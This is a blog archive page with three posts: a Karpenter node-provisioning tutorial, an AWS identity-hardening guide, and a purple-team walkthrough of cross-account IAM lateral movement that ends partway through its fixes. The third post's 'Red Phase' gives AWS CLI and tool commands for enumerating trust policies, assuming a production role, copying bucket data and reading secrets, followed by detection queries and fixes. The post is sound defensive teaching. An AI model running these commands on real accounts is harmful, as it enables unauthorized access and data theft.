AWS Archives - Linuxcent

Karpenter: Just-in-Time Node Provisioning for Kubernetes

July 25, 2026 by Vamshi Krishna Santhapuri

Reading Time: 5 minutes

Kubernetes Ecosystem: From User to Contributor, Episode 8
← EP07: Crossplane vs Terraform · EP08: Karpenter · EP09: Karpenter vs Cluster Autoscaler →

11 min read

TL;DR

Karpenter node provisioning means no pre-defined node groups at all — it looks at pending pods’ actual resource requests and provisions the specific instance type and size that fits, directly
NodePool and NodeClass are Karpenter’s two core CRDs: NodePool declares provisioning constraints and instance-type flexibility, NodeClass declares the cloud-specific details (AMI, subnets, security groups)
Consolidation is Karpenter’s continuous bin-packing behavior — it doesn’t just scale up when pods are pending, it actively replaces underutilized nodes with better-fitting ones to reduce cost
Karpenter handles spot interruption notices natively, draining gracefully before the two-minute warning expires, rather than relying on a separate spot-handling daemon
Originally AWS-only, Karpenter has been donated to Kubernetes SIGs specifically to become a cross-cloud project — provider parity for GKE, AKS, and others is real, current, in-progress work
Contribution opportunity: non-AWS provider feature parity is an explicitly open area with active upstream tracking — a genuinely current place to contribute

The Big Picture

CLUSTER AUTOSCALER MODEL                    KARPENTER MODEL
─────────────────────────                    ────────────────
Pre-defined node groups                      No node groups
(ASG A: m5.large, ASG B: m5.xlarge, ...)     Pending pod: needs 2 vCPU, 4Gi
        │                                            │
Pod pending, no capacity                     Karpenter evaluates: cheapest
        │                                    instance type that actually
Scale UP the node group                      fits, from a flexible list —
that (roughly) fits                          could be any instance family
        │                                    allowed by the NodePool
New node joins — may be                              │
oversized or undersized                      Provisions exactly that instance
for the actual pod                           — right-sized to the real
                                              pending workload

Karpenter node provisioning removes the middle abstraction layer entirely — instead of scaling a pre-sized group and hoping the group’s instance type roughly matches what’s pending, it computes the actual best-fit instance for the actual pending pods, every time.

NodePool and NodeClass: Karpenter’s Core CRDs

apiVersion: karpenter.sh/v1
kind: NodePool
metadata:
  name: general-purpose
spec:
  template:
    spec:
      requirements:
      - key: karpenter.k8s.aws/instance-category
        operator: In
        values: ["c", "m", "r"]      # flexible across instance families
      - key: karpenter.k8s.aws/instance-generation
        operator: Gt
        values: ["4"]
      nodeClassRef:
        name: default
  disruption:
    consolidationPolicy: WhenUnderutilized
    expireAfter: 720h
---
apiVersion: karpenter.k8s.aws/v1
kind: EC2NodeClass
metadata:
  name: default
spec:
  amiFamily: AL2023
  subnetSelectorTerms:
  - tags: {karpenter.sh/discovery: my-cluster}
  securityGroupSelectorTerms:
  - tags: {karpenter.sh/discovery: my-cluster}

NodePool says “here’s the range of instance types you’re allowed to choose from, and here’s the disruption policy” — it’s about scheduling flexibility. EC2NodeClass (or the equivalent for other providers) says “here’s the actual cloud-specific detail” — AMI, subnets, security groups. Splitting these two concerns is deliberate: a platform team can offer multiple NodePools with different cost/performance trade-offs, all referencing the same underlying NodeClass.

How Karpenter Actually Picks an Instance Type

$ kubectl get nodeclaims
NAME            TYPE          ZONE         NODE               READY   AGE
general-x7k2l   c6a.xlarge    us-east-1a   ip-10-0-1-42...    True    45s

$ kubectl describe nodeclaim general-x7k2l
...
Events:
  Reason              Message
  ------              -------
  Launched            Launched instance: i-0abc123... c6a.xlarge
  #                    ^^^^^^^^^^ — chosen because it was the cheapest
  #                    instance type in the allowed range that fit
  #                    the pending pods' actual CPU/memory requests

A NodeClaim is the record of one provisioning decision — it shows exactly which instance type Karpenter chose and why, unlike a node-group scale-up event, which just tells you the group’s already-fixed instance type was used again regardless of fit.

Consolidation: Karpenter’s Continuous Bin-Packing

# Karpenter continuously evaluates whether existing nodes could be
# consolidated into fewer, better-utilized nodes
$ kubectl get nodeclaims -o wide
NAME            TYPE         CPU-UTIL   MEM-UTIL
node-a          m5.2xlarge   15%        20%
node-b          m5.2xlarge   18%        22%
#                                             both underutilized — Karpenter
#                                             may consolidate these two onto
#                                             a single, smaller instance

This is the behavior that most differentiates Karpenter from a traditional autoscaler: it doesn’t just react to pending pods by scaling up. It continuously looks for opportunities to replace a set of underutilized nodes with fewer, better-fitting ones — actively working to reduce cost, not just meet demand.

Interruption Handling: Spot Instances Done Right

# Karpenter watches for AWS's spot interruption notice natively
$ kubectl get events --field-selector reason=DisruptionTerminating
LAST SEEN   REASON                  MESSAGE
5s          DisruptionTerminating   Node terminating due to spot interruption,
                                     draining pods gracefully before 2-minute deadline

Before Karpenter, handling spot interruptions gracefully typically meant running a separate tool (like AWS Node Termination Handler) alongside your autoscaler. Karpenter builds this in directly — it’s part of the same controller making the original provisioning decision, not a bolted-on separate system watching for the same signal independently.

⚠ Production Gotchas

Aggressive consolidation without a properly configured PodDisruptionBudget can cause more pod churn than teams expect. Karpenter respects PDBs, but if you haven’t set them, consolidation can evict pods more freely than a team used to Cluster Autoscaler’s more conservative default behavior anticipated.

A misconfigured NodeClass (wrong subnet tags, wrong security group selector) fails silently from the scheduler’s point of view — pods just stay pending, and the actual error is in Karpenter’s controller logs or NodeClaim events, not anywhere the standard kubectl get pods workflow surfaces by default.

Karpenter’s own controller needs real resource requests and, ideally, its own dedicated nodes or a stable node pool — running the thing that provisions your nodes on a node that might itself get consolidated away is a bootstrapping problem worth designing around explicitly.

Quick Reference

kubectl get nodepools                       # provisioning policies defined
kubectl get nodeclasses                     # cloud-specific node configuration
kubectl get nodeclaims                      # individual provisioning decisions
kubectl describe nodeclaim <name>            # why this specific instance was chosen
kubectl get events --field-selector reason=DisruptionTerminating   # interruption/consolidation activity

Contribution Opportunity: Closing Non-AWS Provider Feature Parity

The limitation: Karpenter started as an AWS-specific project and has since been donated to Kubernetes SIGs specifically to become a genuinely cross-cloud tool. The GKE provider and others are real and actively developed, but feature parity with the mature AWS provider — specific instance-selection heuristics, certain disruption/consolidation behaviors, provider-specific NodeClass capabilities — isn’t complete yet, and this is openly tracked, not hidden.

Why it’s hard to fix: Each cloud’s instance-provisioning API, spot-interruption signaling mechanism, and networking model differs meaningfully — replicating AWS provider behavior on GCP or Azure isn’t a port, it’s a re-implementation against a different API with different constraints and different edge cases, done by a provider team with less historical runtime than the original AWS implementation had.

What a contribution-shaped fix looks like: The kubernetes-sigs/karpenter-provider-gcp (and other provider) repositories maintain their own issue trackers with specific, scoped feature-parity gaps against the AWS implementation — this isn’t a vague “make it better,” it’s a list of concrete, individually-tractable items. Picking one specific parity gap, understanding how the AWS provider solved the equivalent problem, and implementing the analogous behavior for the target cloud is real, wanted, trackable upstream work — precisely the shape of contribution this series has been pointing at throughout.

Key Takeaways

Karpenter provisions the actual best-fit instance for pending pods directly, with no pre-defined node-group middle layer
NodePool (scheduling flexibility) and NodeClass (cloud-specific detail) are deliberately separated concerns
Consolidation is active, continuous bin-packing — Karpenter looks for cost savings, not just capacity needs
Native spot interruption handling removes the need for a separate termination-handling tool
Non-AWS provider feature parity is explicitly open, tracked work — a real, current, well-scoped contribution opportunity in a project under active cross-cloud expansion

What’s Next

EP09 puts Karpenter head-to-head against the tool it’s increasingly replacing — Cluster Autoscaler — and gives a clear recommendation for when the older, node-group model is still the right choice.

Next: EP09 — Karpenter vs Cluster Autoscaler: Why AWS Built Its Own Scaler

Get EP09 in your inbox when it publishes → linuxcent.com/subscribe

Cloud-Native Hardening: Securing the AWS Identity Perimeter

July 7, 2026 by Vamshi Krishna Santhapuri

Reading Time: 6 minutes

Zero to Hero: Cybersecurity Architecture Masterclass, Module 3
← Module 2: Proactive Design · Module 3: Cloud-Native Hardening · Module 4: Resilience & Survival →

12 min read

TL;DR

Cloud native infrastructure hardening starts from a different assumption than on-prem hardening: there is no network perimeter, only an identity perimeter — every AWS API call is the boundary
IMDSv1 (the EC2 metadata service without a token) is the single highest-leverage cloud-native hardening fix available — it turned an SSRF bug into the Capital One breach
IAM policy design is architecture, not IT administration: least privilege, permission boundaries, and SCPs compose into the actual perimeter
Infrastructure-as-code scanning (checkov, tfsec) catches identity-perimeter mistakes in a pull request instead of in an incident
aws iam simulate-principal-policy answers “can this role actually do that?” definitively, without waiting to find out in production
Recommendation: treat IMDSv2 enforcement and IAM least-privilege review as pipeline gates, not periodic audits — the same “build constraint, not process step” principle from the OS Hardening series

The Big Picture: The Perimeter Moved to the API Call

ON-PREM MODEL                          CLOUD-NATIVE MODEL
──────────────                          ──────────────────
Firewall at network edge                No fixed network edge
        │                                        │
Trusted internal subnet                 Every API call carries its
        │                                 own identity + policy
Server assumed safe if                          │
inside the firewall                     IAM evaluates: who is this,
                                          what can they do, right now
                                                 │
                                          Perimeter = the IAM policy
                                          attached to the caller

Cloud-native infrastructure hardening means accepting that the network no longer defines what’s trusted — the AWS identity perimeter, enforced entirely through IAM policy evaluation on every single API call, is the only perimeter that actually exists. Module 1 called this the shift from network-centric to identity-centric trust; this module makes it concrete with the two failures that actually break it in production: a leaky metadata service and an over-permissioned role.

The Breach That Made IMDSv2 Mandatory

In 2019, a misconfigured WAF in front of a bank’s application allowed a Server-Side Request Forgery (SSRF) — an attacker convinced the application server to make an HTTP request to http://169.254.169.254, the EC2 instance metadata endpoint. IMDSv1 answered with no authentication required at all: temporary IAM credentials for the role attached to that instance, handed to anyone who could make the server issue that one request.

Those credentials had read access to S3. The attacker used them to exfiltrate over 100 million customer records. This is the Capital One breach — covered in full in the Purple Team series — and it is the single clearest illustration in cloud history of why “the perimeter is the identity, not the network” isn’t a slogan — it’s a description of exactly where that breach actually happened. The WAF misconfiguration was the entry point. The metadata service handing out credentials with zero verification was the architectural failure that turned an SSRF bug into a 100-million-record breach.

IMDSv2 closes this specific gap by requiring a session token, fetched via a PUT request, before any metadata GET request is honored — and that PUT request cannot be replayed through a typical SSRF, because SSRF vulnerabilities almost always only allow GET-style requests to be forged. This single setting is the highest-leverage cloud-native hardening control available, and it should be enforced at the account level, not left as an opt-in per instance:

# Check whether IMDSv2 is enforced (HttpTokens: required) on an instance
$ aws ec2 describe-instances --instance-ids i-0abc123 \
    --query 'Reservations[].Instances[].MetadataOptions'
{
    "HttpTokens": "required",
    "HttpPutResponseHopLimit": 1,
    "HttpEndpoint": "enabled"
}
# "required" = IMDSv2 only. "optional" = IMDSv1 still works — the gap.

# Enforce it account-wide for all new instances
$ aws ec2 modify-instance-metadata-defaults \
    --http-tokens required --http-put-response-hop-limit 1

IAM Policy Design Is Architecture

If the metadata service is one way the identity perimeter leaks, an over-permissioned IAM policy is the other — and it’s far more common, because it doesn’t require a bug at all. It only requires a policy written with "Resource": "*" because scoping it felt like it would slow down a deploy.

Least privilege means a role can do exactly what its function requires and nothing else — not “read-only across the account,” but “read this specific S3 prefix, write to this specific queue.”

Permission boundaries cap what a role can ever be granted, even by someone with iam:CreatePolicy access — a safety rail against exactly the kind of iam:PassRole privilege escalation covered in the Cloud IAM series, not just against the policy as originally written.

Service Control Policies (SCPs) apply at the AWS Organization level, capping what any role in an account can do regardless of how permissive that account’s own IAM policies are — the outermost layer of the identity perimeter, and the one that survives a single account being compromised.

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": ["s3:GetObject"],
    "Resource": "arn:aws:s3:::billing-invoices/tenant-4471/*"
  }]
}

That policy can only ever read one tenant’s invoice prefix. Compare it to "Resource": "arn:aws:s3:::billing-invoices/*" — functionally identical for the one use case the developer was testing, and catastrophically different the day this role’s credentials leak.

Quick Check: Can This Role Actually Do That?

Don’t wait to find out in production. aws iam simulate-principal-policy evaluates a specific action against a role’s actual attached and inline policies — including SCPs and permission boundaries — and gives you a definitive allow/deny before anything runs:

$ aws iam simulate-principal-policy \
    --policy-source-arn arn:aws:iam::123456789012:role/billing-api-role \
    --action-names s3:GetObject \
    --resource-arns arn:aws:s3:::billing-invoices/tenant-9982/*

{
  "EvaluationResults": [{
    "EvalActionName": "s3:GetObject",
    "EvalResourceName": "arn:aws:s3:::billing-invoices/tenant-9982/*",
    "EvalDecision": "explicitDeny",     # ← the answer you needed before deploying
    "MatchedStatements": [...]
  }]
}

explicitDeny here means some policy statement — the role’s own policy, a permission boundary, or an SCP — explicitly blocks the action, and that takes precedence over any Allow anywhere else in the policy chain (Module 1’s deny-by-default evaluation model, in practice). Run this simulation as part of code review for any new IAM policy, not after the role is already attached to a running service.

Catching This Before It Ships: Cloud-Native Hardening via IaC Scanning

Manually reviewing every Terraform IAM policy in every pull request doesn’t scale past a handful of engineers. checkov and tfsec scan infrastructure-as-code for exactly the patterns above — wildcard resources, IMDSv1 left enabled, public S3 buckets — as a CI step, before terraform apply ever runs:

$ checkov -d ./terraform --check CKV_AWS_79,CKV_AWS_8

Check: CKV_AWS_79: "Ensure Instance Metadata Service Version 1 is not enabled"
    FAILED for resource: aws_instance.billing_api
    File: main.tf:14-22

Check: CKV_AWS_8: "Ensure IAM policies do not allow full administrative privileges"
    FAILED for resource: aws_iam_role_policy.billing_api_policy
    File: iam.tf:8-15
        Resource: "*"

A failed checkov check blocking a pull request is the identity-perimeter equivalent of Stratum’s pipeline gate refusing to snapshot an unhardened image — the unsafe configuration never reaches an account where it can be exploited, because the check runs before merge, not after an audit finds it months later.

Production Gotchas

IMDSv2 enforcement can break old SDKs and tools silently. Some older AWS SDK versions and third-party agents assume IMDSv1 and simply fail to fetch credentials once HttpTokens: required is set — test in staging before enforcing account-wide.

iam simulate-principal-policy doesn’t account for resource-based policies on the target. It evaluates the principal’s policies correctly, but if the target (an S3 bucket, a KMS key) has its own resource policy denying access, you need simulate-custom-policy with both policies supplied to get the full picture.

SCPs fail closed in a way that’s easy to misdiagnose. An SCP deny produces the same AccessDenied error as a missing IAM permission — check the SCP layer explicitly before assuming the role’s own policy is the problem, or you’ll spend an hour widening a policy that was never the actual blocker.

checkov/tfsec false positives erode trust in the gate fast. Suppress specific, documented exceptions inline (#checkov:skip=CKV_AWS_79:reason) rather than disabling the check account-wide the first time it blocks something legitimate.

Framework Alignment

Framework	Control / ID	Architectural Mapping
NIST CSF 2.0	PR.AA-05	Access permissions are managed, incorporating least privilege and separation of duties.
NIST SP 800-207	Zero Trust	The identity perimeter, enforced per-API-call, is the direct implementation of continuous verification.
ISO 27001:2022	8.2	Privileged access rights are restricted and managed.
SOC 2	CC6.3	The entity authorizes, modifies, or removes access based on roles and responsibilities.

Key Takeaways

The identity perimeter, not the network, is what cloud-native hardening actually secures — every IAM policy evaluation is a perimeter check
IMDSv2 enforcement is the single highest-leverage fix available and should be an account-wide default, not an opt-in
Least privilege, permission boundaries, and SCPs are three layers of the same perimeter — design all three deliberately, don’t rely on one
aws iam simulate-principal-policy gives a definitive answer before deployment instead of an incident after
IaC scanning turns identity-perimeter mistakes into blocked pull requests instead of production findings

What’s Next

Module 3 hardened the identity perimeter against external and lateral threats. Module 4 asks what happens after a perimeter fails anyway — specifically, how immutable, WORM-locked data architecture makes ransomware and mass-deletion attacks survivable even when an attacker has already gotten past every control this module covers.

Next: Module 4: Resilience & Survival — Immutable Data Architecture and Surviving Ransomware via WORM

Get the full masterclass in your inbox → linuxcent.com/subscribe

Cloud Lateral Movement: Cross-Account IAM Role Chaining Explained

July 4, 2026 by Vamshi Krishna Santhapuri

Reading Time: 12 minutes

What is purple team security? → OWASP Top 10 mapped to cloud infrastructure → Cloud security breaches 2020–2025 → Broken access control in AWS → MFA fatigue attacks → CI/CD secrets exposure → SSRF to cloud metadata → Kubernetes container escape → Supply chain attacks → Cloud Lateral Movement

TL;DR

Cloud lateral movement IAM is OWASP A01: attackers move between cloud accounts by exploiting cross-account IAM trust relationships — no network pivoting, no exploit, just a valid sts:AssumeRole call
The structural vulnerability is a trust policy scoped too broadly — arn:aws:iam::DEV_ACCOUNT:root instead of the specific Lambda execution role ARN — which lets any identity in the dev account assume the prod role
The full attack chain: compromised Lambda in dev account → enumerate cross-account trust policies → aws sts assume-role into prod → access data lake S3 bucket → exfiltrate before detection fires
CloudTrail is the primary detection surface: AssumeRole events where the principal account ID differs from the resource account ID are the signal; GuardDuty surfaces the pattern as Recon:IAMUser/UserPermissions
AWS Access Analyzer automatically flags overly-broad cross-account trust policies — it should be running in every account in your organization, not just the management account
The structural fix is three layers: scope trust policy to the specific source ARN, add ExternalId for confused deputy protection, and use AWS Organizations SCPs to restrict cross-account role assumptions to approved account pairs only

OWASP Mapping: A01 Broken Access Control — cross-account IAM trust policies that specify an entire account root as the principal, instead of a specific role ARN, give any identity in the source account the ability to pivot into the target account.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│               CROSS-ACCOUNT IAM LATERAL MOVEMENT                    │
│                                                                      │
│   DEV ACCOUNT (111111111111)                                         │
│   ┌────────────────────────────────────────────┐                    │
│   │  Lambda: api-processor                     │                    │
│   │  Execution Role: lambda-execution-role     │◄── COMPROMISED     │
│   │                                            │                    │
│   │  Attacker has: access key for this role    │                    │
│   └───────────────────┬────────────────────────┘                    │
│                        │                                             │
│                        │  sts:AssumeRole                             │
│                        │  (cross-account API call)                  │
│                        ▼                                             │
│   ┌─────────────────────────────────────────────┐                   │
│   │  TRUST POLICY CHECK (prod account role)     │                   │
│   │                                             │                   │
│   │  Principal: arn:aws:iam::111111111111:root  │                   │
│   │              ↑ TOO BROAD — any dev identity │                   │
│   └───────────────────┬─────────────────────────┘                   │
│                        │ ALLOW                                       │
│                        ▼                                             │
│   PROD ACCOUNT (222222222222)                                        │
│   ┌────────────────────────────────────────────┐                    │
│   │  Role: datalake-reader                     │                    │
│   │  Access: s3:GetObject on prod-datalake-*   │                    │
│   │          rds:Connect on prod-analytics-db  │                    │
│   │          secretsmanager:GetSecretValue      │                    │
│   └────────────────────┬───────────────────────┘                    │
│                         │                                            │
│                         ▼                                            │
│   customer-data.parquet, analytics schemas, DB credentials          │
│   ← exfiltrated in 23 minutes                                        │
└─────────────────────────────────────────────────────────────────────┘

Cloud lateral movement IAM attacks succeed because the authentication step — the sts:AssumeRole call — works exactly as designed. The Lambda’s identity is valid. The cross-account trust policy explicitly allows it. AWS faithfully issues the temporary credentials. The entire attack is indistinguishable from legitimate application behavior at the API level, which is why the trust policy is the only reliable prevention point.

The Incident: Dev Lambda to Prod Data Lake

Post-breach analysis. The attacker didn’t find a zero-day. They found a GitHub repository.

A developer had committed an .env file to a public repo containing AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY for a Lambda execution role in the dev account. GitHub’s secret scanning flagged it and notified the security team — but the notification arrived 58 minutes after the commit. By then, an automated credential scanner had already found it, validated the keys, and passed them to an attacker.

That 58-minute window is the entire story.

The Lambda’s execution role was scoped to the dev account, so initial triage assumed the blast radius was limited to dev. It wasn’t. A previous sprint had set up a cross-account trust relationship so the Lambda could read from the prod data lake during a data quality audit. The trust policy on the datalake-reader role in prod read:

"Principal": {"AWS": "arn:aws:iam::111111111111:root"}

Not the Lambda’s specific execution role ARN. The entire dev account root. Any identity in the dev account — including the one the attacker now held — could assume datalake-reader in prod.

The attacker enumerated cross-account roles from inside the compromised Lambda context, found the trust relationship, assumed the prod role, listed the data lake S3 bucket, and exfiltrated 14 GB of customer data parquet files before the first GuardDuty finding surfaced.

The revelation: cloud lateral movement doesn’t require network pivoting. It requires finding one IAM trust relationship that’s too broad.

The compromise of the dev Lambda was recoverable — rotate credentials, remediate the repo, done. The cross-account trust policy turned it into a prod data breach.

Red Phase: The Cross-Account Attack Chain

Step 1: Enumerate Trust Policies from a Compromised Role

An attacker’s first move inside a cloud environment is always the same: establish who they are and what they can reach.

aws sts get-caller-identity
# Returns:
# {
#   "UserId": "AROAIOSFODNN7EXAMPLE:function-name",
#   "Account": "111111111111",
#   "Arn": "arn:aws:sts::111111111111:assumed-role/lambda-execution-role/function-name"
# }

# List roles in the current account and their trust policies
# The trust policy (AssumeRolePolicyDocument) shows who can assume each role
aws iam list-roles \
  --query 'Roles[*].[RoleName,AssumeRolePolicyDocument]' \
  --output json | \
  jq '.[] | {
    role: .[0],
    principals: (.[1].Statement[].Principal.AWS // .[1].Statement[].Principal.Service)
  }'

# More targeted: find roles that have cross-account trust relationships
# Look for principal ARNs from a different account ID
aws iam list-roles --output json | \
  jq --arg own_account "111111111111" \
  '.Roles[] | 
    .AssumeRolePolicyDocument.Statement[] |
    select(.Principal.AWS? | 
      strings | 
      test($own_account) | not
    ) |
    {role: .Resource // "check-parent", principal: .Principal}'

# Simulate whether the current identity can assume a specific cross-account role
# This confirms the trust policy actually allows the assumption before trying it
aws iam simulate-principal-policy \
  --policy-source-arn arn:aws:iam::111111111111:role/lambda-execution-role \
  --action-names sts:AssumeRole \
  --resource-arns arn:aws:iam::222222222222:role/datalake-reader \
  --query 'EvaluationResults[0].EvalDecision' \
  --output text
# Returns: allowed

Step 2: Assume the Cross-Account Role

# Assume the target role — this is the lateral movement step
aws sts assume-role \
  --role-arn arn:aws:iam::222222222222:role/datalake-reader \
  --role-session-name "recon-$(date +%s)" \
  --query 'Credentials'
# Returns:
# {
#   "AccessKeyId": "ASIAIOSFODNN7EXAMPLE",
#   "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
#   "SessionToken": "IQoJb3JpZ2luX2...(truncated)",
#   "Expiration": "2024-01-15T14:32:00Z"
# }

# Export the credentials to use in subsequent commands
export AWS_ACCESS_KEY_ID="ASIAIOSFODNN7EXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2..."

# Confirm the new identity — now operating in prod account context
aws sts get-caller-identity
# {
#   "Account": "222222222222",  ← prod account
#   "Arn": "arn:aws:sts::222222222222:assumed-role/datalake-reader/recon-1705327920"
# }

Step 3: Enumerate and Exfiltrate from Prod

# What buckets are accessible from this role?
aws s3 ls

# Enumerate the data lake bucket
aws s3 ls --recursive s3://prod-datalake-bucket | \
  awk '{print $3, $4}' | \
  sort -rn | \
  head -20
# Shows: file sizes and paths
# 15728640  customer-data/2024/01/customer-data.parquet
# 8388608   analytics/sessions/session-events.parquet
# ...

# Exfiltrate — this is a single API call, logged in CloudTrail
aws s3 cp s3://prod-datalake-bucket/customer-data/2024/01/ /tmp/ \
  --recursive \
  --quiet

# Check for Secrets Manager access
aws secretsmanager list-secrets \
  --query 'SecretList[].{Name:Name,LastRotated:LastRotatedDate}' \
  --output table

aws secretsmanager get-secret-value \
  --secret-id prod/analytics-db/credentials \
  --query 'SecretString' \
  --output text

Step 4: Role Chaining — Staying in the Environment

Role chaining is assuming one role then using that session to assume another. It extends the attacker’s reach without returning to the original compromised identity.

# From the prod datalake-reader context, can we go further?
# Check what other roles trust this prod role, or what this role can assume
aws iam list-roles --output json | \
  jq '.Roles[] | 
    select(.AssumeRolePolicyDocument.Statement[].Principal.AWS? | 
      strings | 
      test("datalake-reader")
    ) | .RoleName'

# If the datalake-reader role has sts:AssumeRole permissions itself,
# the chain continues — each hop gets a fresh 1-hour session
aws sts assume-role \
  --role-arn arn:aws:iam::222222222222:role/analytics-admin \
  --role-session-name "second-hop-$(date +%s)"

Tools Attackers Use for Cloud Lateral Movement Enumeration

Pacu (Rhino Security Labs): Modular AWS exploitation framework. The iam__enum_users_roles_policies_groups and iam__privesc_scan modules map the full IAM graph and identify assumption paths automatically.

# Pacu: enumerate IAM and find assumable roles
pacu
> run iam__enum_users_roles_policies_groups
> run iam__privesc_scan

CloudFox (Bishop Fox): Designed specifically for finding attack paths in cloud environments. The assume-role command enumerates all roles the current identity can assume, including cross-account.

# CloudFox: find all roles assumable from current identity
cloudfox aws -p target-profile assume-role -v2

# CloudFox: find all cross-account trust relationships
cloudfox aws -p target-profile resource-trusts -v2

aws-recon: Broad enumeration tool that maps IAM, S3, EC2, RDS, Secrets Manager, and trust relationships across accounts in a single pass.

Blue Phase: Detection

CloudTrail Signal: Cross-Account AssumeRole

Every sts:AssumeRole call is logged in CloudTrail. Cross-account calls are the specific signal to filter for.

# Query CloudTrail for cross-account AssumeRole events in the last 24 hours
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole \
  --start-time "$(date -d '24 hours ago' --iso-8601=seconds)" \
  --output json | \
  jq '.Events[].CloudTrailEvent | fromjson |
    select(
      .requestParameters.roleArn != null and
      (.userIdentity.accountId != null) and
      (.requestParameters.roleArn | test(.userIdentity.accountId) | not)
    ) |
    {
      time: .eventTime,
      source_identity: .userIdentity.arn,
      source_account: .userIdentity.accountId,
      assumed_role: .requestParameters.roleArn,
      session_name: .requestParameters.roleSessionName,
      source_ip: .sourceIPAddress
    }'

The CloudTrail event structure for a cross-account assumption looks like this:

{
  "eventSource": "sts.amazonaws.com",
  "eventName": "AssumeRole",
  "userIdentity": {
    "type": "AssumedRole",
    "accountId": "111111111111",
    "arn": "arn:aws:sts::111111111111:assumed-role/lambda-execution-role/function-name"
  },
  "requestParameters": {
    "roleArn": "arn:aws:iam::222222222222:role/datalake-reader",
    "roleSessionName": "recon-1705327920"
  },
  "sourceIPAddress": "203.0.113.42",
  "userAgent": "aws-cli/2.13.0 Python/3.11.0 Linux/5.15.0"
}

The key fields: userIdentity.accountId is 111111111111 (dev), requestParameters.roleArn contains 222222222222 (prod). Those two account IDs not matching is the cross-account signal.

A fresh compromise indicator: userAgent showing aws-cli for a role that normally only calls AWS APIs from Lambda runtime (which uses the Python SDK and shows a different user agent). Lambda functions don’t call the CLI — if you see aws-cli user agent on a Lambda role, that’s a human or automated tool using stolen credentials.

Athena Query: Cross-Account Assumptions Across the Organization

-- Athena against S3-backed CloudTrail logs (org-level trail)
-- Finds all cross-account AssumeRole events in the past 7 days
SELECT
  eventtime,
  useridentity.accountid AS source_account,
  useridentity.arn AS source_identity,
  requestparameters['roleArn'] AS target_role,
  sourceipaddress,
  useragent,
  -- Flag: session created quickly after identity first seen (fresh compromise)
  CASE
    WHEN DATEDIFF(
      'minute',
      CAST(eventtime AS timestamp),
      CURRENT_TIMESTAMP
    ) < 300 THEN 'RECENT'
    ELSE 'AGED'
  END AS session_age
FROM cloudtrail_logs
WHERE
  eventsource = 'sts.amazonaws.com'
  AND eventname = 'AssumeRole'
  AND errorcode IS NULL
  AND from_iso8601_timestamp(eventtime) > current_timestamp - interval '7' day
  -- Cross-account: source account ID not in the target role ARN
  AND useridentity.accountid NOT IN (
    SELECT DISTINCT
      REGEXP_EXTRACT(requestparameters['roleArn'], 'arn:aws:iam::(\d+):', 1)
    FROM cloudtrail_logs
    WHERE eventname = 'AssumeRole'
  )
ORDER BY eventtime DESC;

GuardDuty Findings for IAM Lateral Movement

GuardDuty surfaces the following finding types relevant to cross-account lateral movement:

Finding Type	What It Signals
`Recon:IAMUser/UserPermissions`	Identity enumerating IAM roles, policies, or permissions — consistent with Step 1
`PrivilegeEscalation:IAMUser/AdministrativePermissions`	API calls attempting to gain admin access
`UnauthorizedAccess:IAMUser/TorIPCaller`	Assumed role used from Tor exit node
`CredentialAccess:IAMUser/AnomalousBehavior`	Credential access pattern deviates from baseline
`Exfiltration:S3/ObjectRead.Unusual`	S3 read volume spike — fires after the exfiltration in Step 3

# Pull active GuardDuty findings scoped to IAM lateral movement indicators
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "Recon:IAMUser/UserPermissions",
          "PrivilegeEscalation:IAMUser/AdministrativePermissions",
          "CredentialAccess:IAMUser/AnomalousBehavior",
          "Exfiltration:S3/ObjectRead.Unusual"
        ]
      },
      "severity": {
        "GreaterThanOrEqualTo": 4
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {
    type: .Type,
    severity: .Severity,
    account: .AccountId,
    resource: .Resource.AccessKeyDetails.UserName,
    created: .CreatedAt
  }'

AWS Access Analyzer: Automated Trust Policy Audit

Access Analyzer scans all resource-based policies in the account and flags any that grant access to principals outside the account or organization. It surfaces the vulnerable trust policy before an attacker finds it.

# List all Access Analyzer findings — these are cross-account or public access grants
ANALYZER_ARN=$(aws accessanalyzer list-analyzers \
  --query 'analyzers[0].arn' --output text)

aws accessanalyzer list-findings \
  --analyzer-arn "${ANALYZER_ARN}" \
  --filter '{"status": {"eq": ["ACTIVE"]}}' \
  --output json | \
  jq '.findings[] | {
    id: .id,
    resource_type: .resourceType,
    resource: .resource,
    principal: .principal,
    action: .action,
    condition: .condition,
    created: .createdAt
  }'

An Access Analyzer finding for the vulnerable trust policy looks like:

{
  "id": "a1b2c3d4-...",
  "resourceType": "AWS::IAM::Role",
  "resource": "arn:aws:iam::222222222222:role/datalake-reader",
  "principal": {"AWS": "arn:aws:iam::111111111111:root"},
  "action": ["sts:AssumeRole"],
  "condition": {},
  "status": "ACTIVE"
}

The arn:aws:iam::111111111111:root principal with no condition block is the flag — the entire dev account, no restrictions.

Purple Phase: Structural Fixes

Fix 1: Scope the Trust Policy to the Specific Source ARN

This is the primary fix. The trust policy should name the exact role that needs access, not the account root.

// BAD — allows any identity in the dev account to assume this role
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111111111111:root"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

// GOOD — only the specific Lambda execution role can assume this role
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111111111111:role/api-processor-lambda-execution-role"
      },
      "Action": "sts:AssumeRole",
      "Condition": {
        "StringEquals": {
          "sts:ExternalId": "prod-datalake-access-v1"
        }
      }
    }
  ]
}

# Update an existing trust policy to scope it properly
aws iam update-assume-role-policy \
  --role-name datalake-reader \
  --policy-document file://scoped-trust-policy.json

Fix 2: Add ExternalId for Confused Deputy Protection

